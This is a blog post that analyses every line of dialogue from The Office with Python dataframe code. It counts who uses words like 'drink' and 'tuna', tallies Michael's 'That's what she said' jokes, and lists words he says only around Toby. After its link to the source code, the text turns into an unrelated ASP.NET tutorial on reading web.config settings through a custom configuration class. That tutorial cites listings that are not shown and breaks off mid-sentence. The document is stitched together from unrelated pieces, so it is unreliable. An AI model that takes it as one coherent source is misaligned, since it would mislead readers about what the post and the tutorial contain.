That's What They Said The Office has been one of my all-time favorite shows since I caught the "Michael Scott's Dunder Mifflin Scranton Meredith Palmer Memorial Celebrity Rabies Awareness Pro-Am Fun Run Race for the Cure" episode back in 2007. It's absurdly quotable, it's lousy with memorable characters, and it's got one of the best finales I've seen of any show. Image('images/finale1.PNG') So imagine my delight when I stumble across a dataset cataloguing every single line of dialogue across its 9 seasons. I had to do a bit of data cleaning before I started tinkering around with it (GitHub link below), but ultimately it came out looking like this: df = do_all_data_loading() df.head() Where each row represents a line of dialogue, labeled by when it happened in the script and who spoke it. With the help of some simple text-parsing methods, we can better investigate this file for classic lines from the show. line_search(df, 'bears. beets. battlestar galactica') And filter down to the rows of data around them bbbg = get_dialogue(df, season=3, episode=20, scenes=[1, 4]) bbbg And print them for your captioning-convenience import textwrap for idx, row in bbbg.iterrows(): *_, quote, speaker = row print(speaker + ':') wrapper = textwrap.TextWrapper(initial_indent='\t', subsequent_indent='\t') print(wrapper.fill(quote)) j?! jim: Last week, I was in a drug store and I saw these glasses. Uh, four dollars. And it only cost me seven dollars to recreate the rest of the ensemble. And that's a grand total of... [Jim calculates the total on his calculator-watch] eleven dollars. dwight: You know what? Imitation is the most sincere form of flattery, so I thank you. [Jim places a bobble-head on his desk] Identity theft is not a joke, Jim! Millions of families suffer every year! jim: ... MICHAEL! dwight: Oh, that's funny. MICHAEL! YouTubeVideo(id='WaaANll8h18', width=500) Awesome. Given that the show aired on NBC, it's a safe bet that hard searching for F-Bombs and other usual suspects will be fruitless. However, if we instead do a search for asterisks, as it would show up in the script, we can get to the bottom of who's got the foulest mouth at Dunder-Mifflin. profanity = line_search(df, '\*') profanity['speaker'].value_counts() kevin 2 michael 2 kelly 1 deangelo 1 oscar 1 darryl 1 phyllis 1 jo 1 pam 1 toby 1 brandon 1 andy 1 robert 1 ryan 1 Name: speaker, dtype: int64 By the by, I'd highly encourage looking these up-- this show makes excellent use of the censor bleep, IMO profanity Digging around for specific words also yielded some surprising results. For instance, that Meredith is, curiously, only the sixth-highest user of the word "Drink" line_search(df, 'drink')['speaker'].value_counts().head(6) michael 38 dwight 22 jim 19 pam 12 andy 10 meredith 9 Name: speaker, dtype: int64 Image('images/meredith.jpg') Or that Michael spends as much time putting his foot in his mouth about gay culture as the only gay character spends talking about it. line_search(df, 'gay')['speaker'].value_counts().head() oscar 31 michael 31 dwight 17 andy 15 pam 8 Name: speaker, dtype: int64 And less-surprising, is that Andy is far and away the biggest user of the word 'Tuna'. line_search(df, 'tuna')['speaker'].value_counts() andy 63 jim 13 dwight 9 michael 7 walter jr 2 erin 2 kevin 2 holly 2 gabe 2 mark 1 both 1 david wallace 1 creed 1 angela 1 robert 1 front desk clerk 1 kelly 1 Name: speaker, dtype: int64 Of course, the best and most obvious use of our ability to zero-in on keywords in every script is to run some numbers on Michael's many, many "That's what she said" jokes. His track record of often-ill-timed, always-inappropriate innuendos began early in the second season of the show and lasted consistently through his tenure on The Office, cresting in perhaps the dumbest, most-touching context the joke will ever see. First, let's get ahold of each instance of the phrase twss = line_search(df, 'that\'s what she said') twss = twss[twss['speaker'] == 'michael'] twss A respectible 23 times. It's also worth a nod to the fact that on at least 13 occasions, someone else shared Michael's burden. copycats = line_search(df, 'that\'s what she said') copycats = copycats[copycats['speaker'] != 'michael'] len(copycats) 13 And that when we do a similar search on 'he' instead of 'she', we've shared the love 4 times. twhs = line_search(df, 'that\'s what he said') len(twhs) 4 One thing I was curious about, though, was who was teeing Michael up for these jokes. Getting at that was easy enough. We already have each row of data that he says it. All we have to do is grab the row right before it. Your leaderboard: df.loc[twss.index - 1]['speaker'].value_counts() jim 5 michael 3 lester 3 jan 2 kevin 1 holly 1 angela 1 darryl 1 pam 1 second cindy 1 phyllis 1 gabe 1 andy 1 dwight 1 Name: speaker, dtype: int64 Unsurprisingly, Michael sets himself up often (and astute readers will have noticed that some lines above have him doing just that within the span of a sentence or two.) But who's Lester? A bit of poking around, and it turns out that Lester is the name of the attourney that was deposing him in season 4, lol YouTubeVideo('ClzJkv3dpY8', start=240, end=288, width=500) Another interesting avenue within the text data is looking at how vocabulary changes character-to-character. If you've ever seen these two interact, it wouldn't surprise you to learn that Michael's firey hatred for his colleague in HR comes with a good deal of engendered language. And not just the word "No." (when he learns that Toby has abruptly come back to work after being away for a season). YouTubeVideo('NHh0rf0ojEc', width=500) And so here, I found every line that Michael delivered within a line or two from Toby. # sample the first few records michaelToToby = df[a_spoke_after_b(df, 'michael', 'toby')] michaelToToby.head() Then I extracted all of the unique words that he used throughout the course of the show when speaking to or shortly after him michaelsWordsToToby = set(extract_corpus(michaelToToby)) print(len(michaelsWordsToToby), 'unique words') 1222 unique words Then, I grabbed every line that Michael said after people that he liked. Most notably, his lovers... work friends... daughter-figures... Ryan. And I compiled every unique word that he uses with them. peopleMichaelLikes = ['ryan', 'jim', 'dwight', 'pam', 'holly', 'darryl', 'erin', 'oscar', 'david', 'jan'] niceWords = set() for person in peopleMichaelLikes: michaelToPerson = df[a_spoke_after_b(df, 'michael', person)] niceWords = niceWords.union(set(extract_corpus(michaelToPerson))) print(len(niceWords), 'unique words') 7680 unique words This allowed me to generate words that Michael uniquely uses in reaction to someone he hates so damn much... "If I had a gun with two bullets and was in a room with Hitler, Bin Laden, and Toby, I would shoot Toby twice." -Michael Scott ...that he's never used with anyone else on the show. print(michaelsWordsToToby - niceWords) {'jerk-face', 'nutcases', 'retarded', 'souls', 'shaolin', 'lift', 'heartwarming', 'dawg', 'work-associated', 'assuming', 'culturally', 'principles', 'inferring', 'sream', 'molest', 'slepping', 'twisted', 'binder', 'mediators', 'welcoming', 'smack', 'mornin', 'pufnstuf', 'imploring', 'insisting', 'temple', 'bored', 'pitcher', 'grimaces', 'farting', 'immature', 'shine', 'icebreaker', 'retards', 'creedstanley', 'status', 'anti-christ', 'aaaah', 'benefit', 'zip', 'throats', 'climate', 'meantime', 'interruption', 'influence', 'heartless', 'plague', 'racist', 'anticipation', 'disorder', 'overstating', 'infected', 'mamas', 'balers', 'neve', 'punishment', 'noun', 'overstaying', 'sassy', 'committed', 'beeps', 'jeff', 'sweating', 'dealt', 'virus', 'joshin', 'heh', 'whomevers', 'resistance', 'radon', 'borientationtalks', 'affecting', 'gives-what-what', 'chosen', 'erics', 'lobster', 'interim', 'nigeria', 'crumbles', 'horribleness', 'cutie-pie', 'primary', 'includes', 'snail', 'powerful', 'doll', 'veterinarian', 'affective', 'lamaze', 'director', 'pretended', 'soulless', 'tan', 'flashed', 'insists', 'nile', 'seasonal', 'styles', 'taxpayer', 'villages', 'counseling', 'air-condition---', 'goal', 'slack', 'relatively', 'explicit', 'images', 'involving', 'abraham', 'freedoms', 'uncalled', 'stutter', 'cutoff', 'collect', 'psychological', 'ads', 'probed', 'fatigue', 'agenda-actually', 'pukeys', 'justdrag', 'red-headed', 'caprese', 'exhalesi', 'all-in', 'legitimate', 'pagers', 'alcoholic', 'perv', 'donut', 'verdict', 'hammer', 'carpools', 'discreet', 'witty', 'answered', 'progress', 'undergoing', 'rightful', 'charming', 'meenie', 'been--', 'nuisance', 'wha-wha-wha-wha-what', 'redacted', 'peas', 'psych', 'shifting', 'counselor', 'alf', 'pristine', 'nyeh', 'failure', 'mothers', 'miney', 'unlocks', 'despite', 'squat', 'cruisin', 'mutiny', 'irritability', 'eeny', 'jerky', 'crabs', 'opener', 'air-conditioner', 'flasher', 'alien', 'foliage', 'select', 'skull', 'kills', 'boredom', 'slate', 'cop', 'aaaahhh', 'disrespectful', 'bruisin', 'bedpost', 'tested', 'albeit', 'blow-up', 'whisper', 'winnings', 'puppet', 'beaches', 'respected', 'conflict', 'smelly', 'conflictin', 'biologically', 'comedic', 'fortunate', 'yanks', 'pulp', 'campbell', 'quitter', 'instructed', 'pukey', 'bent', 'steeped', 'inception', 'towel', 'cornerstone', 'peed', 'blabbering', 'notches', 'donuts'} All of the source code for this post can be found at
https://napsterinblue.github.io/blog/2018/05/15/thats-what-they-said/
CC-MAIN-2021-04
refinedweb
1,435
55.88
Results 1 to 3 of 3 - Join Date - Sep 2013 - Location - Accra,Ghana - 10 - Thanks - 0 - Thanked 0 Times in 0 Posts Generating a unique Serial Key in java i have a table ITEMS which has these columns and data Code: Description = Lands & Building Description_Code= LB(001) i also have another table BRANCHES which has these columns and data Branch_Area=Labone Branch_Code=LB(001) example is FC/LB/100/LB/001 Any directions or help will be appreciated THANK YOU - Join Date - Sep 2010 - 2,451 - Thanks - 17 - Thanked 275 Times in 275 Posts Strictly speaking, you want to generate a unique identifier, which you can probably do just by hashing that combination with any number of algorithms. A serial number is a consecutive number assigned in time order. Code: - Join Date - Dec 2013 - 5 - Thanks - 0 - Thanked 0 Times in 0 Posts import java.util.Date; public class IdUniqueHelper { private static final String ALPHABET = "ABC"; private static final long BASE = 36; private static final String DIGIT = "0123456789"; public static String encode(long num) { StringBuilder sb = new StringBuilder(); while (num > 0) { sb.append(ALPHABET.charAt((int) (num % BASE))); num /= BASE; } return sb.reverse().toString(); } public static String getId() { Date date = new Date(); String id = encode(date.getTime()); return id; } } AdSlot6
http://www.codingforums.com/java-and-jsp/304222-generating-unique-serial-key-java.html?s=e7eccc4e824efd422db39ed355ffe249
CC-MAIN-2015-40
refinedweb
210
52.53
This is a java program to find the mode of a set. The mode of a set is defined as the highest occurring element in the set. We count the occurrence of each of the element and print the element whose count is highest. Here is the source code of the Java Program to Find the Mode in a Data Set. The Java program is successfully compiled and run on a Windows system. The program output is also shown below. //This is a java program to find the mode for a given sequence of numbers import java.util.Random; public class Mode { static int N = 20; static int[] sequence = new int[N]; public static int mode() { int maxValue = 0, maxCount = 0; for (int i = 0; i < sequence.length; ++i) { int count = 0; for (int j = 0; j < sequence.length; ++j) { if (sequence[j] == sequence[i]) ++count; } if (count > maxCount) { maxCount = count; maxValue = sequence[i]; } } return maxValue; } public static void main(String args[]) { Random random = new Random(); for (int i = 0; i < N; i++) sequence[i] = Math.abs(random.nextInt(100)); System.out.println("The set of numbers are: "); for (int i = 0; i < N; i++) System.out.print(sequence[i] + " "); System.out.println("\nThe mode of the set is: " + mode()); } } Output: $ javac Mode.java $ java Mode The set of numbers are: 85 3 80 56 37 47 13 11 94 38 6 12 10 31 52 67 81 98 43 37 The mode of the set is: 37 Sanfoundry Global Education & Learning Series – 1000 Java Programs. Here’s the list of Best Reference Books in Java Programming, Data Structures and Algorithms.
http://www.sanfoundry.com/java-program-find-mode-data-set/
CC-MAIN-2017-04
refinedweb
271
62.17
Fourth MSFTCorpDojo today. MineSweeper and MicroPairing this time too.This time we, as a result of the retrospect from last time, we did BDD-style testing (I’ve added one of the test classes below as an example). We decided to start by implementing a parser that parsed the input and created an internal representation of the input that we could later use to generate the output. By the end of the session we had a pretty complete parser with error handling for all kinds of bad input. This is one of the few times I’ve seen any real error handling in a dojo. This time in the retrospect we said that the next time we should implement the other part next time. That is; assume a parsed input in some internal representation and generate the output from that. We also talked about how we do MicroPairing and switch one person in the pair every seven minutes. We decided to next time switch one person in the pair every time the keyboard gets passed instead. Guess that will mean less pair programming since there is no real ping-pong but rather a circular queue. But in our session almost everybody participates all the time anyway so that might not necessarily be a problem. 1: public class Given_a_single_1x1_fieldset_with_no_bombs 2: { 3: private string input; 4: private Field field; 5: 6: public Given_a_single_1x1_fieldset_with_no_bombs() 7: { 8: input = “1 1” + Environment.NewLine + 9: “.” + Environment.NewLine + 10: “0 0”; 11: field = FieldParser.Parse(input).Single(); 12: } 13: 14: [Fact] 15: public void It_should_have_one_row() 16: { 17: Assert.Equal(1, field.Rows); 18: } 19: 20: [Fact] 21: public void It_should_have_one_column() 22: { 23: Assert.Equal(1, field.Columns); 24: } 25: 26: [Fact] 27: public void It_should_have_an_empty_square_0_0() 28: { 29: Assert.False(field.IsBomb(0, 0)); 30: } 31: }
https://blogs.msdn.microsoft.com/cellfish/2009/08/06/coding-dojo-4/
CC-MAIN-2017-26
refinedweb
298
64.3
React uses two types of components: functional and class. The former is equivalent to JavaScript functions while the latter corresponds with JS classes. Functional components are simpler because they are stateless, and React encourages using of this type. At the same time, React creators recommend writing functional components as pure functions, meaning that any state change should be handled outside the component itself. You may encounter components that hold information that affects their rendering, but you don’t want that data to be available for the entire application. In other words, you want to keep the state local and manage it in isolation within that component. Adding state to functional components If you choose to use class components, things are pretty straightforward because they have state built-in. However, if you opt for functional components due to their simplicity, the only way to add state is to use hooks. Let’s say your application consists mostly of functional components and at a later point you realize that you need state in some components. Instead of refactoring the code, you can use a hook such as useState. Hooks don’t work inside class components. Here’s a comparison between a functional component with the useState hook and a class component with built-in state. Functional component:> ); } Here’s the same component, but written as a class: import React, { Component } from "react"; import "./styles.scss"; export default class App extends Component { constructor(props) { super(props); this.state = { size: "default", message: "Default font size" }; } changeBig = () => { this.setState({ size: "big", message: "big" }); }; changeSmall = () => { this.setState({ size: "small", message: "small" }); }; render() { return ( <div className="App"> <p onClick={this.changeBig}>Make the text big</p> <p onClick={this.changeSmall}>Make the text small</p> <div> <h3>Change the font size by pressing a button</h3> </div> <div className={`box ${this.state.size}`}>{this.state.message}</div> </div> ); } } It’s quite clear that the functional component is easier to write and handle be cause it has fewer lines of code and you can just “hook in” and add state as needed. The challenge with this approach is that your stateless component won’t be able to mimic the state change by itself. Because the hooks are internal, you won’t be able to call them. So if you want to test the behavior of this component, you’ll need a function that triggers the state change. This function has to meet two additional requirements: it should be available as a prop of the component and make use of a mocked event. With this in place, you can test whether the state has been updated by looking for its side effects, such as an update in the props of the rendered component. Enough theory — let’s see this in practice! We’ll test the functional component from above with Jest and Enzyme. Building the demo component in React We’ll render a component that changes the size of the font when you press one of the buttons. In the App.js file, add the following code.> ); } Then, in the style.scss file, add this code: .App { font-family: sans-serif; text-align: center; } p { background-color: transparent; color: black; border-radius: 2rem; padding: 0.5rem 2rem; border: 1px solid; margin-right: 0.25rem; display: inline-block; &:hover { background-color: black; color: white; } } .box { background-color: rgb(245, 244, 244); height: 100px; width: 200px; padding: 20px; margin: 20px auto; display: flex; align-content: center; justify-content: center; align-items: center; } .default { font-size: 18px; color: blue; background-color: rgb(219, 245, 255); } .big { font-size: 48px; color: red; background-color: rgb(247, 233, 235); } .small { font-size: 14px; font-weight: bold; color: green; background-color: rgb(219, 255, 219); } When you press the first button, the font size increases. In the same way, when you press the second button, the font size decreases. For this simple application, we want to first test that the component is rendered correctly, and then we’ll test the change in the class name that is supposed to occur after the onClick event. Adding Jest and Enzyme to the project Before writing the tests, let’s clarify why we need both of these tools. Jest and Enzyme are similar, but they’re used for slightly different purposes. They can both perform unit tests, but Jest is a fully featured testing framework, meaning it provides an assertion library to help you test your entire application. Jest tests the components mainly through snapshots, by comparing the output of a rendered component to the saved HTML snapshot. When the two correspond, the test passes, but if the rendered output is different than the snapshot, Jest raises a test failure. The issue with snapshot testing in Jest is that whenever you change even one line of code, you need to repeat the snapshots, then compare the HTML outputs line by line to see what changed. Enzyme solves this issue by providing APIs that examine the components and return a failure or passed response. In this exercise, we’ll use Enzyme and Jest together to keep tests simpler. We’ll create a single test file where we’ll add our configurations, but in a real-life project, it’s good practice to keep these separated. Let’s first add Jest and Enzyme as dependencies. The next step is to create a new file for the test and name it App.test.js. import React from "react"; import Adapter from "enzyme-adapter-react-16"; import { shallow, configure } from "enzyme"; import App from "./App"; configure({ adapter: new Adapter() }); describe("App", () => { it("renders correctly", () => { shallow(<App />); }); }); The imports are needed for Enzyme tests to work properly with React in this exercise. If we look at the syntax of the test, we see that it uses some keywords: describebreaks down a test suite into multiple smaller tests. You can nest multiple describestatements if you want to divide the tests even more itdescribes a single test. In other words, itexplains what the component should do. This statement can’t be nested shallowrenders a single component, without including its children, so it’s perfect for rendering isolated components and performing pure unit tests Now let’s run this first test and see if the component renders correctly. What if we change the class name for the small, green font and use default? Let’s see what happens when we change the code and run the test again. The test still passes, even if the behavior is not correct, because we’re not testing the behavior with this type of test. Let’s do one more exercise before testing the functionality and check whether the rendered component includes two paragraphs. In the App.test.js file, I’ve adjusted the code as follows: import React from "react"; import Adapter from "enzyme-adapter-react-16"; import { shallow, configure } from "enzyme"; import App from "./App"; configure({ adapter: new Adapter() }); describe("App", () => { it("renders correctly", () => { shallow(<App />); }); it("includes two paragraphs", () => { const wrapper = shallow(<App />); expect(wrapper.find("p").length).toEqual(2); }); }); Now we’re checking whether the rendered component finds two paragraphs. Indeed, the test passes. Finally, let’s test the actual functionality of the app and see if the state changes on click. We’ll mock a function for this and write the test as follows. it("should update state on click", () => { const changeSize = jest.fn(); const wrapper = mount(<App onClick={changeSize} />); const handleClick = jest.spyOn(React, "useState"); handleClick.mockImplementation(size => [size, changeSize]); wrapper.find("#para1").simulate("click"); expect(changeSize).toBeTruthy(); }); Here, we’re first defining a mock function, changeSize = jest.fn(). This function adjusts the state of the component and is called in the handleClick function. We’re using the jest.spyOn() function, which has the following syntax: jest.spyOn(object, methodName) This function creates a mock function similar to jest.fn while tracking the calls to the object’s method ( methodName). So we’re testing to validate whether calling this function actually calls the useState hook (function). If useState is called, when we simulate the click on the #para1 (first paragraph), we should get a truthy value for the changeSize function. When we run the tests, we see that this one passes as well. I hope this guide gives you an idea of how to test your React functional components. In particular, I hope you come away with a better understanding of the state changes for components that use hooks, with Jest and Enzyme as testing libraries. “Testing state changes in React functional components” with this approach we need to interact with the component’s DOM and simulate the events which I feel like E2E test. I feel uncomfortable to see ‘find’ in unit tests. What do you say?
https://blog.logrocket.com/testing-state-changes-in-react-functional-components/
CC-MAIN-2021-04
refinedweb
1,454
64.51
16 Joined Last visited Community Reputation148 Neutral About Art N Peace - RankMember - Hey, I'll need you to accept my friend add on Skype if you're still interested in joining the team. - Thanks again , Karsten. I knew what the repositories did but I didn't understand why one seemed suddenly more popular than the other right now. Also, Websvn worked perfectly. Had it up and running in 2 minutes! - Thanks alot, Karsten. I was wondering if there were any simpler alternatives and I wasn't aware of these. I think I'll give them a go. But maybe you can answer another question? What's the difference between Git and SVN? I had wanted to try Github instead of SVN but I also couldn't configure that thing either, though I got much further than I did with Trac. Art N Peace posted a topic in For Beginners :) Art N Peace replied to patisake's topic in For BeginnersAs a straight up noob, I use Orwell Dev C++ I wanted to use something more substantial/long term like Netbeans or VS, but I couldn't get them set-up properly. Not newb friendly at all I had to download other pieces of software, install them, set them up in the IDE ...and I just barely understand what an IDE is so I just gave it up for now and went with Dev C++. It's plug and play. All the advice here so far is great, though. Thanks everyone Art N Peace replied to Art N Peace's topic in For BeginnersI think I figured it out, though I still don't understand what exactly happened. There was a file which the IDE made by default called main.cpp. Based on the reading of the error which referenced that file, it was somehow being included in the compile process of the gameover.cpp. I don't know why. I deleted the main.cpp and the code ran perfectly. It would be nice to understand what that error means though. Thanks. Art N Peace posted a topic in For BeginnersI'm using an old book that teaches programming and I keep getting an error that I don't understand. The book is: [i]Beginning C++ Game Programming[/i] by Michael Dawson I've tried running the code in Dev-C++ and Netbeans IDE. No luck. I'm wondering if the lesson code within is dated (the book is old, 2004)? Here's the program I'm trying to run: [code]#include <iostream> using namespace std; /* * */ int main() { cout << "Game Over!" << endl; return 0; }[/code] Here's the error I'm getting: [code]build/Debug/Cygwin-Windows/main.o: In function `main': /cygdrive/c/Users/User2/Documents/NetBeansProjects/cppLessons/main.cpp:15: multiple definition of `_main' build/Debug/Cygwin-Windows/gameover2.o:/cygdrive/c/Users/User2/Documents/NetBeansProjects/cppLessons/gameover2.cpp:16: first defined here collect2: ld returned 1 exit status make[2]: *** [dist/Debug/Cygwin-Windows/cpplessons.exe] Error 1 make[1]: *** [.build-conf] Error 2 make: *** [.build-impl] Error 2 BUILD FAILED (exit value 2, total time: 3s)[/code] What does this mean and how do I fix it? Thank you for your help. Unity Art N Peace posted a topic in General and Gameplay ProgrammingI'm in the process of selecting a game engine for development of a game. Two engines have piqued my interest: Gamestudio and Unity 3. As far as ease of use, learning curve, versatility, and capability what do you coders who have used these engines think? I am just looking for feedback from people who have used these engines and wanting to know how they felt about them. I don't know a great deal about engines, but I do know what I want and need from one. How does Gamestudio pan out? Unity 3? - Hoping to finally get my own game project going! I'm sticking with it no matter how long it takes ...but uhh, hopefully not too long :D Art N Peace reviewed GameDev.net Admin's article in General and Gameplay Programming
https://www.gamedev.net/profile/179309-art-n-peace/?tab=classifieds
CC-MAIN-2017-30
refinedweb
682
66.23
Subject: Re: [boost] Futures (was: Re: [compute] Some remarks) From: Niall Douglas (s_sourceforge_at_[hidden]) Date: 2015-01-12 10:30:29 On 7 Jan 2015 at 12:40, Thomas Heller wrote: > > What is missing on POSIX is a portable universal kernel wait object > > used by everything in the system. It is correct to claim you can > > easily roll your own with a condition variable and an atomic, the > > problem comes in when one library (e.g. OpenCL) has one kernel wait > > object and another library has a slightly different one, and the two > > cannot be readily composed into a single wait_for_all() or > > wait_for_any() which accepts all wait object types, including > > non-kernel wait object types. > > Exactly, this could be easily achieved by defining an appropriate API for the > shared state of asynchronous operations, the wait functions would then just > use the async result objects, which in turn use to wait the functionality as > implemented in the shared state. You still seem to be assuming the existence of a shared state in wait objects :( I suppose it depends on how you define a shared state, but for that non-allocating design of mine the (a better name) "notification target" is the promise if get_future() has never been called, and the future if get_future() has ever been called. The notification target is kept by an atomic pointer, if he is set he points at a future somewhere, if he is null then either the promise is broken or the target is the promise. > A portable, universal kernel wait object is > not really necessary for that. I think a portable, universal C API kernel wait object is very necessary if C++ is to style itself as a first tier systems programming language. We keep trivialising C compatibility, and we should not. > Not everyone wants to pay for the cost of a > kernel transition. You appear to assume a kernel transition is required. My POSIX permit object can CAS lock spin up to a certain limit before even considering to go acquire a kernel wait object at all, which I might add preferentially comes from a user side recycle list where possible. So if the wait period is very short, no kernel transition is required, indeed you don't even call malloc. That said, its design is highly limited to doing what it does because it has to make hard coded conservative assumptions about its surrounding environment. It can't support coroutines for example, and the fairness implementation does make it quite slow compared to a CAS lock because it can't know if fairness is important or not, so it must assume it is. Still, this is a price you need to pay if you want a C API which cannot take template specialisations. > This is an implementation detail of a specific future > island, IMHO. Aside from that, i don't want to limit myself to POSIX. My POSIX permit object also works perfectly on Windows using the Windows condition variable API. And on Boost.Thread incidentally, I patch in the Boost.Thread condition_variable implementation. That gains me the thread cancellation emulation support in Boost.Thread and makes the boost::permit<> class fairly trivial to implement. > > > Ok. Hands down: What's the associated overhead you are talking > > > about? Do you have exact numbers? > > > > I gave you exact numbers: a 13% overhead for a SHA256 round. > > To quote your earlier mail: > "The best I could get it to is 17 cycles a byte, with the scheduling > (mostly future setup and teardown) consuming 2 cycles a byte, or a > 13% overhead which I feel is unacceptable." > > So which of these "mostly future setup and teardown" is related to exception > handling? Please read > from page 32 onwards. > I was under the impression that we left the "exceptions are slow" discussion > way behind us :/ I didn't claim that. I claimed that the compiler can't optimise out the generation of exception handling boilerplate in the present design of futures, and I personally find that unfortunate. The CPU will end up skipping over most of the generated opcodes, and without much overhead if it has a branch predictor, but it is still an unfortunate outcome when futures could be capable of noexcept. Then the compiler could generate just a few opcodes in an ideal case when compiling a use of a future. With regard to the 13% overhead above, almost all of that overhead was the mandatory malloc/free cycle in present future implementations. > <snip> > > 1. Release BindLib based AFIO to stable branch (ETA: end of January). > > 2. Get BindLib up to Boost quality, and submit for Boost review (ETA: > > March/April). > Just a minor very unrelated remark. I find the name "BindLib" very confusing. The library is a toolkit for locally binding libraries into namespaces :). It means that library A can be strongly bound to vX of library B, while library C can be strongly bound to vY of library B, all in the same translation unit. This was hard to do in C++ until C++ 11, and it's still a non-trivial effort though BindLib takes away a lot of the manual labour. > > I might add that BindLib lets the library end user choose what kind > > of future the external API of the library uses. Indeed BindLib based > > AFIO lets you choose between std::future and boost::future, and > > moreover you can use both configurations of AFIO in the same > > translation unit and it "just works". I could very easily - almost > > trivially - add support for a hpx::future in there, though AFIO by > > design needs kernel threads because it's the only way of generating > > parallelism in non-microkernel operating system kernels (indeed, the > > whole point of AFIO is to abstract that detail away for end users). > > *shiver* I wouldn't want to maintain such a library. This sounds very > dangerous and limiting. Note that both boost::future and hpx::future are far > more capable than the current std::future with different performance > characteristics. A lot of people expressed that opinion before I started BindLib - they said the result would be unmaintainable, unstable and by implication, the whole idea was unwise. I thought they were wrong, and now I know they are wrong. Future implementations, indeed entire threading implementations, are quite substitutable for one another when they share a common API, and can even coexist in the same translation unit surprisingly well. One of the unit tests for AFIO compiles a monster executable consisting of five separate builds of the full test suite each with a differing threading, filesystem and networking library, all compiled in a single repeatedly reincluded all header translation unit. It takes some minutes for the compiler to generate a binary. The unit tests, effectively looped five times but with totally different underlying library dependency implementations, all pass all green. You might think it took me a herculean effort to implement that. It actually took me about fifteen hours. People overestimate how substitutable STL threading implementations are, if your code already can accept any of Dinkumware vs SGI vs Apple STL implementations, it's a very small additional step past that. Niall -- ned Productions Limited Consulting Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
https://lists.boost.org/Archives/boost/2015/01/219041.php
CC-MAIN-2020-10
refinedweb
1,217
60.35
Most. Most programmers have used the Application object to store system-wide values. While this is a convenient storage facility, it does have a few disadvantages: - Everything is stored as an Object data type in the Application object. This takes up more memory than a specific data type and, since you must explicitly cast the value each time you wish to use it, this can be a performance hit. - There is no IntelliSense when retrieving or setting values into the Application object. If you are setting a value and you do not remember what you called the key of the stored value, you will need to look up the key manually by searching through your program. If you do not spell the key correctly, you will inadvertently create a new variable in the Application object. - If you read values from the web.config file, you will need to refresh the values within the Application object yourself. There is no automatic detection of changes. Retrieving Application Variables Using web.config The most common method of storing application-wide settings is to place these values into the <appSettings> section of your web.config file as shown in the following code fragment: <appSettings> <add key="ConnectString" value="Server=(local);Database=Northwind;uid=sa" /> <add key="SiteName" value="ConfigSample" /> </appSettings> You can then read these values during the Application_Start event by using the following code: Sub Application_Start(ByVal sender As Object, _ ByVal e As EventArgs) Application("ConnectString") = System.Configuration. _ ConfigurationSettings.AppSettings("ConnectString") Application("SiteName") = System.Configuration. _ ConfigurationSettings.AppSettings("SiteName") End Sub To retrieve the values, you would write code like the following: Private Sub Page_Load(ByVal sender As System.Object, _ ByVal e As System.EventArgs) Handles MyBase.Load lblAppSiteName.Text = Application("SiteName").ToString lblAppConnectString.Text = _ Application("ConnectString").ToString End Sub The values SiteName and ConnectString that you pass to the Application object are not verified until runtime. This means that if you misspell "SiteName" as "SileName," you will not notice this error until runtime. This type of error can be very hard to track down. In addition, you must apply the ToString method to convert the object within the Application object to a string. If you store any other data type within the Application object, you need to call the CType() or use the Convert class and one of its appropriate methods. This means more typing and time to perform the conversion. Creating a Configuration Class There is a better mechanism for reading in values in the web.config file. This mechanism takes advantage of ASP.NET's ability to call any class you specify to read values from the web.config file. You do this by using settings within the web.config file. There are many benefits to using this class: You get an IntelliSense-aware list of properties for each value you specify, each property has a specific data type and, finally, if any values have changed in the web.config file the values are automatically refreshed. While. - Create a <configSections> element in the web.config file. - Add a <section> element with some attributes that describe the name of your configuration class and where it is located. - Add your own <config> element with your own user-defined keys and values to read. - Create a Class that implements the IConfigurationSectionHandler interface. - Write the appropriate implementation of the Create method in your class. - Create an initialization method to be called from the Application_Start event in Global.asax. - Add a call to an initialization method in your class from the Application_Start event procedure in Global.asax. - Add properties that correspond to each of the keys and values you created in your configuration section in web.config. After you have done these steps, it is a simple matter of adding properties to the class that correspond to the various keys that you create in your <config> element. Changing the web.config File The first step is to create a <configSections> element in the web.config file. You may add one or more of your own <config> sections depending on how you might want to categorize your settings. Follow the steps below to create a sample project that demonstrates how to create a configuration class that can dynamically change values. - Create a new ASP.NET Web Application project in Visual Studio .NET. Set the name to ConfigSample. - Open web.config and add the XML, shown in Listing 1, immediately below the <configuration> tag. In the <configSections> element, add a <section> tag to define the name of the next element. In this example, it is called AppConfig. This means that you will create another section with the <AppConfig> element somewhere in the web.config file. In addition, you need to define the full namespace and class name of the class you create to read the data from this configuration section. In this example it is called ConfigSample.AppConfig. ConfigSample is the name of this project (and thus the name of the namespace), AppConfig is the name of the class you will create in this project to read the values from the AppConfig section. After this you add a comma and then repeat the namespace one more time. You can define as many <add key=> tags in the <AppConfig> element as you want. For each one of these tags, you will most likely create a public property to expose these from the AppConfig class. In the example shown in Listing 1 you have two keys: ConnectString and SiteName. Create the AppConfig Class Now that you have the configuration section created, it is time to create the AppConfig class. There are three important items that you must do to create this class correctly. First, you must implement the interface IConfigurationSectionHandler (for more information on implementing interfaces see the ".NET Interface-based Programming" in the May/June issue of CoDe Magazine). Second, you must create an Init method. Third, you must implement the Create method from the IConfigurationSectionHandler interface. Refer to Listing 2. The Init Method You need to create a method within the AppConfig class to call from the Application_Start event procedure in the Global.asax page. This initializes the "AppConfig" configuration section of the web.config file. Refer to Listing 3. The. Testing the Application Now that you have created your class and set key values into your web.config file, it is time to test the application. Follow the steps below to create a user interface to display the values from the web.config file. - Display Webform1.aspx in design mode. - Set the pageLayout property to FlowLayout. - Select Table, Insert, Table from the Visual Studio .NET menu. - Create a table with 2 rows and 2 columns. - Click OK. - Click into the first cell of the first row in the table and double-click on the Label control in the toolbox. - Set the Text property of this control to Site Name. - Click into the second cell of the first row in the table and double-click on the Label control in the toolbox. - Set the Name property to lblSiteName. - Set the Text property of this control to an empty value. - Click into the first cell of the second row in the table and double-click on the Label control in the toolbox. - Set the Text property of this control to Connect String. - Click into the second cell of the second row in the table and double-click on the Label control in the toolbox. - Set the Name property to lblConnect. - Set the Text property of this control to an empty value. - Double click the form to display the Page_Load event procedure. - Add the following code to the page. You can test your AppConfig class by retrieving the properties and placing them into labels. Private Sub Page_Load(ByVal sender As System.Object, _ ByVal e As System.EventArgs) Handles MyBase.Load lblSiteName.Text = AppConfig.SiteName lblConnect.Text = AppConfig.ConnectString End Sub Run the application and you should see the values you typed into the web.config file appear in the labels on the form. With the application still running, modify the values in the web.config file and click the 